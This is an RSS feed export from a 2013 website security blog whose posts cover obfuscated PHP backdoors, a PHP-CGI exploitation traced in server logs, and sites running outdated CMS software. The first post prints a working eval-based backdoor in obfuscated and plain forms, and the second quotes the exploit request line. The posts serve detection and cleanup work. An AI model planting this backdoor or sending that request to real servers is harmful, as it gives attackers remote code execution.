<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:creativeCommons="http://backend.userland.com/creativeCommonsRssModule"
>

<channel>
	<title>White Fir Design Web Security Blog</title>
	<atom:link href="http://www.whitefirdesign.com/blog/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.whitefirdesign.com/blog</link>
	<description>A critcal look at the state of website security.</description>
	<lastBuildDate>Fri, 24 May 2013 19:24:38 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.5.1</generator>
<creativeCommons:license>http://creativecommons.org/licenses/by-nc-sa/3.0/us/</creativeCommons:license>
		<item>
		<title>Hackers Attempting To Hide Malicious Code in Files With Comments</title>
		<link>http://www.whitefirdesign.com/blog/2013/05/24/hackers-attempting-to-hide-malicious-code-in-files-with-comments/</link>
		<comments>http://www.whitefirdesign.com/blog/2013/05/24/hackers-attempting-to-hide-malicious-code-in-files-with-comments/#comments</comments>
		<pubDate>Fri, 24 May 2013 19:24:38 +0000</pubDate>
		<dc:creator>White Fir Design</dc:creator>
				<category><![CDATA[Website Hacked]]></category>

		<guid isPermaLink="false">http://www.whitefirdesign.com/blog/?p=1648</guid>
		<description><![CDATA[When hackers add malicious code to a website&#8217;s files they often obfuscate it in some way. A simple method looks like this: eval(base64_decode(LypZYk9PKi9pZi8qX1U8ZkpPbTgqLygvKjdTU31NKi9pc3NldC8qT2FDKi8oLypyWE9KMyovJF9SRVFVRVNULypDMyEqL1svKlVpJiovJ2onLyohfk1lKi8uLyotaUJVJigqLydnJy8qKS41XGwqLy4vKm50YGpnbCovJ2snLypAXmo/Ki8uLypcOE13PF4qLyd2bycvKk47a3xCVyovXS8qOnM7Ki8vKjxAXXd+ISovKS8qUGQgKi8vKkJDRW1xKi8pLypWZ0xwbiovZXZhbC8qZStNcyE9PiovKC8qVERCISovc3RyaXBzbGFzaGVzLypeenBXbyovKC8qSGFMeVE7Ki8kX1JFUVVFU1QvKjo4TDYmVHMqL1svKnY+XWI1aXwqLydqJy8qak1lKi8uLyooSiZJOCovJ2cnLyooTUpnOiovLi8qdGo5LSovJ2snLyo3OVl8eU8qLy4vKnlsd2h3Ki8ndm8nLypBS08nXHMqL10vKm5TTDZ9Ki8vKmEySSovKS8qJX0hMyovLyo6VDZwZkAqLykvKjRKOlQmKi8vKlxZeWtEZW8qLzsvKmdpLWBEKi8=)); This method isn&#8217;t very effective as a method to disguise the code as the code will stick &#8230; <a href="http://www.whitefirdesign.com/blog/2013/05/24/hackers-attempting-to-hide-malicious-code-in-files-with-comments/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
				<content:encoded><![CDATA[<p style="word-wrap: break-word;">When hackers add malicious code to a website&#8217;s files they often obfuscate it in some way. A simple method looks like this:</p>
<blockquote>
<p style="word-wrap: break-word;">eval(base64_decode(LypZYk9PKi9pZi8qX1U8ZkpPbTgqLygvKjdTU31NKi9pc3NldC8qT2FDKi8oLypyWE9KMyovJF9SRVFVRVNULypDMyEqL1svKlVpJiovJ2onLyohfk1lKi8uLyotaUJVJigqLydnJy8qKS41XGwqLy4vKm50YGpnbCovJ2snLypAXmo/Ki8uLypcOE13PF4qLyd2bycvKk47a3xCVyovXS8qOnM7Ki8vKjxAXXd+ISovKS8qUGQgKi8vKkJDRW1xKi8pLypWZ0xwbiovZXZhbC8qZStNcyE9PiovKC8qVERCISovc3RyaXBzbGFzaGVzLypeenBXbyovKC8qSGFMeVE7Ki8kX1JFUVVFU1QvKjo4TDYmVHMqL1svKnY+XWI1aXwqLydqJy8qak1lKi8uLyooSiZJOCovJ2cnLyooTUpnOiovLi8qdGo5LSovJ2snLyo3OVl8eU8qLy4vKnlsd2h3Ki8ndm8nLypBS08nXHMqL10vKm5TTDZ9Ki8vKmEySSovKS8qJX0hMyovLyo6VDZwZkAqLykvKjRKOlQmKi8vKlxZeWtEZW8qLzsvKmdpLWBEKi8=));</p>
</blockquote>
<p>This method isn&#8217;t very effective as a method to disguise the code as the code will stick out and it is easy enough to do a search through all the files on a website for eval(base64_decode( and similar functions that are used, find matching code, and then undo obfuscation to check for malicious code. We sometimes see other methods are more effective, but more often than not the less effective ones are used. One other method that we have been seeing used a lot recently is hiding the code among numerous comments. Because comments are ignored when code is executed, the additional code only impacts someone trying to review the code. Here is one example of malicious code hidden among comments:</p>
<blockquote><p>/*YbOO*/if/*_U&lt;fJOm8*/(/*7SS}M*/isset/*OaC*/(/*rXOJ3*/$_REQUEST/*C3!*/[/*Ui&amp;*/'j'/*!~Me*/./*-iBU&amp;(*/'g'/*).5\l*/./*nt`jgl*/'k'/*@^j?*/./*\8Mw&lt;^*/'vo'/*N;k|BW*/]/*:s;*//*&lt;@]w~!*/)/*Pd *//*BCEmq*/)/*VgLpn*/eval/*e+Ms!=&gt;*/(/*TDB!*/stripslashes/*^zpWo*/(/*HaLyQ;*/$_REQUEST/*:8L6&amp;Ts*/[/*v&gt;]b5i|*/&#8217;j'/*jMe*/./*(J&amp;I8*/&#8217;g'/*(MJg:*/./*tj9-*/&#8217;k'/*79Y|yO*/./*ylwhw*/&#8217;vo&#8217;/*AKO&#8217;\s*/]/*nSL6}*//*a2I*/)/*%}!3*//*:T6pf@*/)/*4J:T&amp;*//*\YykDeo*/;/*gi-`D*/</p></blockquote>
<p>It probably looks like a bunch of gibberish to you. But amongst the apparent gibberish is the malicious code (shown in bold):</p>
<blockquote><p>/*YbOO*/<strong>if</strong>/*_U&lt;fJOm8*/<strong>(</strong>/*7SS}M*/<strong>isset</strong>/*OaC*/<strong>(</strong>/*rXOJ3*/<strong>$_REQUEST</strong>/*C3!*/<strong>[</strong>/*Ui&amp;*/'<strong>j</strong>'/*!~Me*/./*-iBU&amp;(*/'<strong>g</strong>'/*).5\l*/./*nt`jgl*/'<strong>k</strong>'/*@^j?*/./*\8Mw&lt;^*/'<strong>vo</strong>'/*N;k|BW*/<strong>]</strong>/*:s;*//*&lt;@]w~!*/<strong>)</strong>/*Pd *//*BCEmq*/<strong>)</strong>/*VgLpn*/<strong>eval</strong>/*e+Ms!=&gt;*/<strong>(</strong>/*TDB!*/<strong>stripslashe</strong>s/*^zpWo*/<strong>(</strong>/*HaLyQ;*/<strong>$_REQUEST</strong>/*:8L6&amp;Ts*/<strong>[</strong>/*v&gt;]b5i|*/&#8217;<strong>j</strong>&#8216;/*jMe*/./*(J&amp;I8*/&#8217;<strong>g</strong>&#8216;/*(MJg:*/./*tj9-*/&#8217;<strong>k</strong>&#8216;/*79Y|yO*/./*ylwhw*/&#8217;<strong>vo</strong>&#8216;/*AKO&#8217;\s*/<strong>]</strong>/*nSL6}*//*a2I*/<strong>)</strong>/*%}!3*//*:T6pf@*/<strong>)</strong>/*4J:T&amp;*//*\YykDeo*/<strong>;</strong>/*gi-`D*/</p></blockquote>
<p>When the comments are stripped out you can see the code by itself:</p>
<blockquote><p>if(isset($_REQUEST[jgkvo]))eval(stripslashes($_REQUEST[jgkvo]));</p></blockquote>
<p>That code is a simple backdoor that will execute the code from the variable &#8220;jgkvo&#8221; when it is sent to a web page that the malicious code is in.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.whitefirdesign.com/blog/2013/05/24/hackers-attempting-to-hide-malicious-code-in-files-with-comments/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	<creativeCommons:license>http://creativecommons.org/licenses/by-nc-sa/3.0/us/</creativeCommons:license>
	</item>
		<item>
		<title>Is Your Web Host Keeping PHP Up to Date?</title>
		<link>http://www.whitefirdesign.com/blog/2013/05/23/is-your-web-host-keeping-php-up-to-date/</link>
		<comments>http://www.whitefirdesign.com/blog/2013/05/23/is-your-web-host-keeping-php-up-to-date/#comments</comments>
		<pubDate>Thu, 23 May 2013 22:25:26 +0000</pubDate>
		<dc:creator>White Fir Design</dc:creator>
				<category><![CDATA[Website Security]]></category>

		<guid isPermaLink="false">http://www.whitefirdesign.com/blog/?p=1640</guid>
		<description><![CDATA[When it comes to keeping your website secure your web host should be the least of your worries. These are technology companies, sometimes rather large, whose focus is on websites. You would think that they would be better at handling &#8230; <a href="http://www.whitefirdesign.com/blog/2013/05/23/is-your-web-host-keeping-php-up-to-date/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
				<content:encoded><![CDATA[<p>When it comes to <a href="http://www.whitefirdesign.com/resources/secure-your-website-from-hackers.html">keeping your website secure</a> your web host should be the least of your worries. These are technology companies, sometimes rather large, whose focus is on websites. You would think that they would be better at handling website security than anyone other security professionals. Unfortunately we often find that they are not. As just one example, last year we discussed the fact that <a title="We Warned Media Temple About The Need to Keep Plesk Up to Date in 2010" href="http://www.whitefirdesign.com/blog/2012/02/27/we-warned-media-temple-about-the-need-to-keep-plesk-up-to-date-in-2010/">Media Temple was incorrectly blaming a hack of websites hosted by them</a> on their customers running outdated software on their websites, while they themselves were running outdated software on their website. Over a year later they are still are not bothering to take the basic step of keeping software running on their website up to date:</p>
<p><a href="http://www.whitefirdesign.com/meta-generator-version-check"><img class="aligncenter size-full wp-image-1643" alt="Media Temple's Sytem Status Website is Running WordPress 3.3.2" src="http://www.whitefirdesign.com/blog/wp-content/uploads/2013/05/media-temple-system-status-website-wordpress-version.png" width="500" height="150" /></a></p>
<p>Trying to access the security of web hosts is difficult because much of the information needed to do that assessment is only available to them. There are some things that you can check on and one of those is whether they are keeping the version of PHP on the server hosting your website up to date. If you are using WordPress, Joomla, Drupal, or a lot of other web software then you are using PHP and it is important to keep that up to date, as a hacked website we cleaned up this week shows.</p>
<p>One of the basic steps of cleaning up a hacked website is determining how it was hacked and then fixing the vulnerability so that the website doesn&#8217;t get hacked again (unfortunately, many companies that clean up hacked websites cut corners and don&#8217;t do this). In reviewing the log files for the website in question we traced the original exploitation to this line in the website&#8217;s access log:</p>
<blockquote><p>91.224.160.25 &#8211; - [16/Apr/2013:19:18:32 -0400] &#8220;POST /?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1&#8243; 200 68</p></blockquote>
<p>What that shows is that a <a href="http://www.php.net/archive/2012.php#id2012-05-03-1">vulnerability</a> in PHP <a href="http://www.php.net/archive/2012.php#id2012-05-08-1">versions prior to 5.3.13 and 5.4.3 </a>was attempting to be exploited. Unfortunately the website in question was running an older vulnerable version of PHP and was configured in a way that made it susceptible to the vulnerability. If PHP had been kept up to date the website would not have been hacked.</p>
<p>The PHP developers fairly regularly release new versions that fix security vulnerabilities in the software. The most recent releases with security fixes were <a href="http://php.net/archive/2013.php#id2013-03-14-1">versions 5.3.23 and 5.4.13</a>, released in March. Unfortunately, we often find that our client&#8217;s web hosts are not keeping PHP up to date. If your web host isn&#8217;t keeping PHP updated you probably should move to a web host that takes such basic security seriously.</p>
<p>If you are wondering what version of PHP your web host is using for your website there are a number of ways to find that out. The least technical way to do that is to contact their customer support and ask them what version of PHP in use. It would also be good to ask them what their upgrade policy is for PHP and other software powering the web server, to make sure that they properly handling that. You can sometimes find the PHP version in use in the control panel for your website or the administrative area of the website. You can also use a tool we have created that allows you to <a href="http://www.whitefirdesign.com/resources/check-what-version-of-software-your-server-is-running.html">check the version of various software running the server your website is on</a>.</p>
<p>&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.whitefirdesign.com/blog/2013/05/23/is-your-web-host-keeping-php-up-to-date/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	<creativeCommons:license>http://creativecommons.org/licenses/by-nc-sa/3.0/us/</creativeCommons:license>
	</item>
		<item>
		<title>StopTheHacker: A Website Security Company That Doesn&#8217;t Care About Security</title>
		<link>http://www.whitefirdesign.com/blog/2013/05/17/stopthehacker-a-website-security-company-that-doesnt-care-about-security/</link>
		<comments>http://www.whitefirdesign.com/blog/2013/05/17/stopthehacker-a-website-security-company-that-doesnt-care-about-security/#comments</comments>
		<pubDate>Fri, 17 May 2013 20:12:21 +0000</pubDate>
		<dc:creator>White Fir Design</dc:creator>
				<category><![CDATA[Bad Security]]></category>

		<guid isPermaLink="false">http://www.whitefirdesign.com/blog/?p=1633</guid>
		<description><![CDATA[They are many companies providing hack/malware cleanup services for websites that are based around providing detection that a website has been compromised. This isn&#8217;t really necessary as a properly secured website is very unlikely to be compromised. Unfortunately, from what &#8230; <a href="http://www.whitefirdesign.com/blog/2013/05/17/stopthehacker-a-website-security-company-that-doesnt-care-about-security/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
				<content:encoded><![CDATA[<p>They are many companies providing hack/malware cleanup services for websites that are based around providing detection that a website has been compromised. This isn&#8217;t really necessary as a <a href="http://www.whitefirdesign.com/resources/secure-your-website-from-hackers.html">properly secured website</a> is very unlikely to be compromised. Unfortunately, from what we have seen of these services, when they do a cleanup they don&#8217;t actually determine how the website was hacked in the first place, fix that issue, and make sure the website is otherwise secured (including updating any software running on the website). Doing those things are fundamental components of a proper cleanup and they website will remain vulnerable if they are not done.</p>
<p>Too often we have clients that come to us after having hired one of these services and had their website continue to be hacked. The client ends up paying to have the website cleaned up twice (or more) and suffering additional costs related to the continued issue with their website instead having it fixed the first time.</p>
<p>Our experience has also been that these services are not good at actually detecting hacks, so your website is not only left vulnerable to being hacked again, but you may not even get alerted that it has been hacked again. Detecting that website has been hacked quickly instead of preventing it from being hacked is also of little use in some instances. For example, if your website is hacked and your customer&#8217;s information is compromised no matter how fast afterwards that it gets detected, the damage has already been done and the information is in the hands of the hacker.</p>
<p>This brings us to <a href="http://www.stopthehacker.com/">StopTheHacker</a>, which based on their name you would assume would be focused on actually protecting websites from hackers. Unfortunately for their customers that isn&#8217;t the case. If you look at the <a href="http://www.stopthehacker.com/features/">features of their service</a> they are mainly focused on detecting that a website has already been hacked instead of making it secure in the first place. That would be bad on its own, but if you are using our Meta Generator Version Check extension, which is available for <a href="https://chrome.google.com/webstore/detail/meta-generator-version-ch/fahebfpoehlhpngkmdgldkkilflkelbl">Chrome</a> and <a href="https://addons.mozilla.org/firefox/addon/meta-generator-version-check/">Firefox</a>, and you visit their website you will find something even more surprising:</p>
<p><a href="http://www.whitefirdesign.com/blog/wp-content/uploads/2013/05/stopthehacker-website-wordpress-version.png"><img class="aligncenter size-full wp-image-1635" alt="StopTheHacker is Running WordPress 3.4.2" src="http://www.whitefirdesign.com/blog/wp-content/uploads/2013/05/stopthehacker-website-wordpress-version.png" width="500" height="150" /></a></p>
<p>That&#8217;s right a website security company is failing to take the basic security measure of keeping software running their website up to date, which in the case of WordPress is very easy to do. Not only has StopTheHacker failed to update WordPress for over six months, but they failed to update when a <a href="http://wordpress.org/news/2013/01/wordpress-3-5-1/">security release was put out back in January</a>.</p>
<p>If StopTheHacker actually did the &#8220;Vulnerability Assessments&#8221; they claim to do as part of their <a href="http://www.stopthehacker.com/features/">service</a>, they would be aware that their own website is insecure. Or maybe they don&#8217;t use their own service? That would say a lot about what they think of it, wouldn&#8217;t it?</p>
<p>A company shouldn&#8217;t have anything to do with website security if they don&#8217;t care about the security of their own website like the StopTheHacker clearly does not, so we strongly recommend you avoid StopTheHacker and focus on doing the things that will actually <a href="http://www.whitefirdesign.com/resources/secure-your-website-from-hackers.html">protect your website</a> instead of using services like theirs that will leave your website insecure.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.whitefirdesign.com/blog/2013/05/17/stopthehacker-a-website-security-company-that-doesnt-care-about-security/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	<creativeCommons:license>http://creativecommons.org/licenses/by-nc-sa/3.0/us/</creativeCommons:license>
	</item>
		<item>
		<title>FEMA Website Running Outdated and Insecure Version of Drupal</title>
		<link>http://www.whitefirdesign.com/blog/2013/04/23/fema-website-running-outdated-and-insecure-version-of-drupal/</link>
		<comments>http://www.whitefirdesign.com/blog/2013/04/23/fema-website-running-outdated-and-insecure-version-of-drupal/#comments</comments>
		<pubDate>Tue, 23 Apr 2013 21:06:58 +0000</pubDate>
		<dc:creator>White Fir Design</dc:creator>
				<category><![CDATA[Bad Security]]></category>
		<category><![CDATA[Drupal]]></category>

		<guid isPermaLink="false">http://www.whitefirdesign.com/blog/?p=1621</guid>
		<description><![CDATA[Last week we mentioned that Department of Homeland of Security (DHS) is failing basic cybersecurity practices by not keeping the software running on their website up to date with security updates. It is probably not surprising that agencies under the &#8230; <a href="http://www.whitefirdesign.com/blog/2013/04/23/fema-website-running-outdated-and-insecure-version-of-drupal/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
				<content:encoded><![CDATA[<p>Last week we mentioned that Department of Homeland of Security (DHS) is failing basic cybersecurity practices by not <a title="DHS Website Running Outdated and Insecure Version of Drupal" href="http://www.whitefirdesign.com/blog/2013/04/16/dhs-website-running-outdated-and-insecure-version-of-drupal/">keeping the software running on their website up to date with security updates</a>. It is probably not surprising that agencies under the DHS are also leaving their websites vulnerable to known security vulnerabilities because they are failing to keep the software running on them up to date. That includes the Federal Emergency Management Agency (FEMA), which if you visit their website with our Drupal Version Check extension installed in your web browser (available for <a href="https://chrome.google.com/webstore/detail/cfgkoondhklepebjanihdiedjmibieii">Chrome</a> and <a href="https://addons.mozilla.org/firefox/addon/drupal-version-check/">Firefox)</a> you will see is also running an outdated version of Drupal:</p>
<p><a href="http://www.whitefirdesign.com/blog/wp-content/uploads/2013/04/fema-website-drupal-version.png"><img class="aligncenter size-full wp-image-1622" alt="FEMA Website is Running Outdated Drupal Version" src="http://www.whitefirdesign.com/blog/wp-content/uploads/2013/04/fema-website-drupal-version.png" width="500" height="150" /></a></p>
<p>Further checking shows that the website is running Drupal 7.17 or 7.18, so FEMA has failed to update the software for over three months, the next version was <a href="http://drupal.org/drupal-7.19">released</a> back in January, and they have missed the last two <a href="http://drupal.org/drupal-7.19">security</a> <a href="http://drupal.org/drupal-7.20">updates</a>.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.whitefirdesign.com/blog/2013/04/23/fema-website-running-outdated-and-insecure-version-of-drupal/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	<creativeCommons:license>http://creativecommons.org/licenses/by-nc-sa/3.0/us/</creativeCommons:license>
	</item>
		<item>
		<title>OWASP Website Running Outdated and Insecure Version of MediaWiki</title>
		<link>http://www.whitefirdesign.com/blog/2013/04/19/owasp-website-running-outdated-and-insecure-version-of-mediawiki/</link>
		<comments>http://www.whitefirdesign.com/blog/2013/04/19/owasp-website-running-outdated-and-insecure-version-of-mediawiki/#comments</comments>
		<pubDate>Fri, 19 Apr 2013 20:51:22 +0000</pubDate>
		<dc:creator>White Fir Design</dc:creator>
				<category><![CDATA[Bad Security]]></category>
		<category><![CDATA[MediaWiki]]></category>

		<guid isPermaLink="false">http://www.whitefirdesign.com/blog/?p=1609</guid>
		<description><![CDATA[The Open Web Application Security Project (OWASP) promotes itself as being &#8220;focused on improving the security of software&#8221;, but unfortunately they don&#8217;t even bother to keep the software running their website up to date. If you visit their website with &#8230; <a href="http://www.whitefirdesign.com/blog/2013/04/19/owasp-website-running-outdated-and-insecure-version-of-mediawiki/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
				<content:encoded><![CDATA[<p>The Open Web Application Security Project (OWASP) promotes itself as being &#8220;focused on improving the security of software&#8221;, but unfortunately they don&#8217;t even bother to keep the software running their website up to date. If you visit their website with our Meta Generator Version Check extension installed in your web browser (available for <a href="https://chrome.google.com/webstore/detail/meta-generator-version-ch/fahebfpoehlhpngkmdgldkkilflkelbl">Chrome</a> and <a href="https://addons.mozilla.org/firefox/addon/meta-generator-version-check/">Firefox)</a> you will see that they are running an outdated version of MediaWiki:</p>
<p><a href="http://www.whitefirdesign.com/blog/wp-content/uploads/2013/04/owasp-website-mediaiwki-version.png"><img class="aligncenter size-full wp-image-1610" alt="OWASP Website is Running MediaWiki 1.18.0" src="http://www.whitefirdesign.com/blog/wp-content/uploads/2013/04/owasp-website-mediaiwki-version.png" width="500" height="150" /></a></p>
<p>OWASP has failed to update their MediaWiki installation for over a year, the next version, 1.18.1, was <a href="http://www.mediawiki.org/wiki/Release_notes/1.18#MediaWiki_1.18.1">released</a> in January of 2012. They failed to apply any of the <a href="http://www.mediawiki.org/wiki/Release_notes/1.18">five security updates</a> that were released for version 1.18.x. Support for version 1.18.x of MediaWiki <a href="http://www.mediawiki.org/wiki/Version_lifecycle#Versions_and_their_end-of-life">ended back in November</a>, so they also should have moved to a supported version some time ago.</p>
<p>Keeping software up to date is one the basic steps and easier steps to keep software running a website secure. The fact that a project dedicated to security is failing to do that highlights how bad the state of security is and raises the questions if the security community is in fact actually interested in security.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.whitefirdesign.com/blog/2013/04/19/owasp-website-running-outdated-and-insecure-version-of-mediawiki/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	<creativeCommons:license>http://creativecommons.org/licenses/by-nc-sa/3.0/us/</creativeCommons:license>
	</item>
		<item>
		<title>White House Website Running Outdated and Insecure Version of Drupal</title>
		<link>http://www.whitefirdesign.com/blog/2013/04/18/white-house-website-running-outdated-and-insecure-version-of-drupal/</link>
		<comments>http://www.whitefirdesign.com/blog/2013/04/18/white-house-website-running-outdated-and-insecure-version-of-drupal/#comments</comments>
		<pubDate>Thu, 18 Apr 2013 19:09:23 +0000</pubDate>
		<dc:creator>White Fir Design</dc:creator>
				<category><![CDATA[Bad Security]]></category>
		<category><![CDATA[Drupal]]></category>

		<guid isPermaLink="false">http://www.whitefirdesign.com/blog/?p=1605</guid>
		<description><![CDATA[While &#8220;President Obama has declared that the “cyber threat is one of the most serious economic and national security challenges we face as a nation” and that “America&#8217;s economic prosperity in the 21st century will depend on cybersecurity.”&#8220;, the White &#8230; <a href="http://www.whitefirdesign.com/blog/2013/04/18/white-house-website-running-outdated-and-insecure-version-of-drupal/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
				<content:encoded><![CDATA[<p>While &#8220;<a href="http://www.whitehouse.gov/cybersecurity">President Obama has declared that the “cyber threat is one of the most serious economic and national security challenges we face as a nation” and that “America&#8217;s economic prosperity in the 21st century will depend on cybersecurity.”</a>&#8220;, the White House is failing to take a basic security measure with their website. If you visit the website with our Drupal Version Check extension installed in your web browser (available for <a href="https://chrome.google.com/webstore/detail/cfgkoondhklepebjanihdiedjmibieii">Chrome</a> and <a href="https://addons.mozilla.org/firefox/addon/drupal-version-check/">Firefox)</a> you will see that they are running an outdated version of Drupal:</p>
<p><a href="http://www.whitefirdesign.com/blog/wp-content/uploads/2013/04/white-house-website-drupal-version.png"><img class="aligncenter size-full wp-image-1606" title="White House Website Drupal Version" alt="White House Website is Running Outdated Drupal Version" src="http://www.whitefirdesign.com/blog/wp-content/uploads/2013/04/white-house-website-drupal-version.png" width="500" height="150" /></a></p>
<p>Further checking shows that the website is running Drupal 6.26 or 6.27, so the White House failed to apply <a href="http://drupal.org/drupal-7.19">one</a> or <a href="http://drupal.org/drupal-7.18">two</a> security updates. Keeping software up to date is one the basic steps and easier steps when it comes to cybersecurity and the White House is failing at that.</p>
<p>Updating between versions of Drupal 7 is relatively easy, so there isn’t any excuse for an organization with its resources to not be able to keep it up to date.</p>
<p>&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.whitefirdesign.com/blog/2013/04/18/white-house-website-running-outdated-and-insecure-version-of-drupal/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	<creativeCommons:license>http://creativecommons.org/licenses/by-nc-sa/3.0/us/</creativeCommons:license>
	</item>
		<item>
		<title>DHS Website Running Outdated and Insecure Version of Drupal</title>
		<link>http://www.whitefirdesign.com/blog/2013/04/16/dhs-website-running-outdated-and-insecure-version-of-drupal/</link>
		<comments>http://www.whitefirdesign.com/blog/2013/04/16/dhs-website-running-outdated-and-insecure-version-of-drupal/#comments</comments>
		<pubDate>Tue, 16 Apr 2013 20:29:50 +0000</pubDate>
		<dc:creator>White Fir Design</dc:creator>
				<category><![CDATA[Bad Security]]></category>
		<category><![CDATA[Drupal]]></category>

		<guid isPermaLink="false">http://www.whitefirdesign.com/blog/?p=1600</guid>
		<description><![CDATA[Ahead of a vote on the CISPA legislation the head of the Department of Homeland Security (DHS) will be briefing members of the House of Representatives today on cybersecurity. Maybe the briefing should be on how not to do cybersecurity &#8230; <a href="http://www.whitefirdesign.com/blog/2013/04/16/dhs-website-running-outdated-and-insecure-version-of-drupal/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
				<content:encoded><![CDATA[<p>Ahead of a vote on the CISPA legislation the head of the Department of Homeland Security (DHS) will be <a href="http://thehill.com/blogs/hillicon-valley/technology/294173-national-security-officials-to-brief-house-members-on-cybersecurity">briefing members of the House of Representatives today on cybersecurity</a>. Maybe the briefing should be on how not to do cybersecurity as the DHS is failing to take a basic security measure with their website. If you visit their website with our Drupal Version Check extension installed in your web browser (available for <a href="https://chrome.google.com/webstore/detail/cfgkoondhklepebjanihdiedjmibieii">Chrome</a> and <a href="https://addons.mozilla.org/firefox/addon/drupal-version-check/">Firefox)</a> you will see that they are running an outdated version of Drupal:</p>
<p style="text-align: center;"><a href="http://www.whitefirdesign.com/blog/wp-content/uploads/2013/04/dhs-website-drupal-version.png"><img class="aligncenter size-full wp-image-1601" alt="Department of Homeland Security Website is Running Outdated Drupal Version" src="http://www.whitefirdesign.com/blog/wp-content/uploads/2013/04/dhs-website-drupal-version.png" width="500" height="150" /></a></p>
<p>Keeping software up to date is one the basic steps and easier steps when it comes to cybersecurity and the DHS is failing at that. The larger question that this raises is what else they might be failing to do when it comes to cybersecurity, since they fail to do something so basic.</p>
<p>Further checking shows that the website is running Drupal 7.14, so the DHS has failed to update the software for over 8 months, the next version was <a href="http://drupal.org/node/1708292">released</a> back in August of 2012, and they have missed the <a href="http://drupal.org/drupal-7.16">last</a> <a href="http://drupal.org/drupal-7.18">4</a> <a href="http://drupal.org/drupal-7.19">security</a> <a href="http://drupal.org/drupal-7.20">updates</a>.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.whitefirdesign.com/blog/2013/04/16/dhs-website-running-outdated-and-insecure-version-of-drupal/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	<creativeCommons:license>http://creativecommons.org/licenses/by-nc-sa/3.0/us/</creativeCommons:license>
	</item>
		<item>
		<title>Web Hosts Blocking Access to WordPress Login Page</title>
		<link>http://www.whitefirdesign.com/blog/2013/04/12/web-hosts-blocking-access-to-wordpress-login-page/</link>
		<comments>http://www.whitefirdesign.com/blog/2013/04/12/web-hosts-blocking-access-to-wordpress-login-page/#comments</comments>
		<pubDate>Fri, 12 Apr 2013 19:38:21 +0000</pubDate>
		<dc:creator>White Fir Design</dc:creator>
				<category><![CDATA[Website Security]]></category>
		<category><![CDATA[WordPress]]></category>

		<guid isPermaLink="false">http://www.whitefirdesign.com/blog/?p=1597</guid>
		<description><![CDATA[We have had a number of people contact us about having issues gaining access to the login page in WordPress recently and we wanted to pass along information that affected websites should be getting told by their web hosts as &#8230; <a href="http://www.whitefirdesign.com/blog/2013/04/12/web-hosts-blocking-access-to-wordpress-login-page/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
				<content:encoded><![CDATA[<p>We have had a number of people contact us about having issues gaining access to the login page in WordPress recently and we wanted to pass along information that affected websites should be getting told by their web hosts as well by now. There has recently massive attempt to brute force the login for WordPress based websites. Hostgator <a href="http://blog.hostgator.com/2013/04/11/global-wordpress-brute-force-flood/">describes</a> it as being a highly-distributed and global attack. While hackers have been attempting to gain access to website, whether using WordPress or a variety of other software, that use weak passwords for years, the big issue here is that the massive size of attempts is causing high load on servers and that has caused web hosts to block access to the WordPress login page while attempting to deal with this. If your website is hosted on a server shared with websites being targeted it can impact your websites even if you are not targeted.</p>
<p>Hostgator has reported seeing over &#8220;90,000 IP addresses involved in this attack&#8221;, which means that a web host cannot simple block a few IP address to stop the attempts. That also provides a reminder that limiting login attempts by blocking IP addresses after several failed attempts has a serious limitation as security feature when massive amount of IP address are available for an attack.</p>
<p>While security of the login process can be improved by restricting login access to certain IP addresses or using multi-factor authentication, websites can prevent an un-targeted login attack by making sure only strong passwords are used.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.whitefirdesign.com/blog/2013/04/12/web-hosts-blocking-access-to-wordpress-login-page/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	<creativeCommons:license>http://creativecommons.org/licenses/by-nc-sa/3.0/us/</creativeCommons:license>
	</item>
		<item>
		<title>Kaspersky Lab&#8217;s US Website Running Outdated and Insecure Version of Drupal</title>
		<link>http://www.whitefirdesign.com/blog/2013/04/12/kaspersky-labs-us-website-running-outdated-and-insecure-version-of-drupal/</link>
		<comments>http://www.whitefirdesign.com/blog/2013/04/12/kaspersky-labs-us-website-running-outdated-and-insecure-version-of-drupal/#comments</comments>
		<pubDate>Fri, 12 Apr 2013 19:08:11 +0000</pubDate>
		<dc:creator>White Fir Design</dc:creator>
				<category><![CDATA[Bad Security]]></category>
		<category><![CDATA[Drupal]]></category>

		<guid isPermaLink="false">http://www.whitefirdesign.com/blog/?p=1593</guid>
		<description><![CDATA[When it comes to internet security one of the most basic steps is keeping your software up to date. In sign of how poor the state of internet security is, even security companies are not taking such a basic step. &#8230; <a href="http://www.whitefirdesign.com/blog/2013/04/12/kaspersky-labs-us-website-running-outdated-and-insecure-version-of-drupal/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
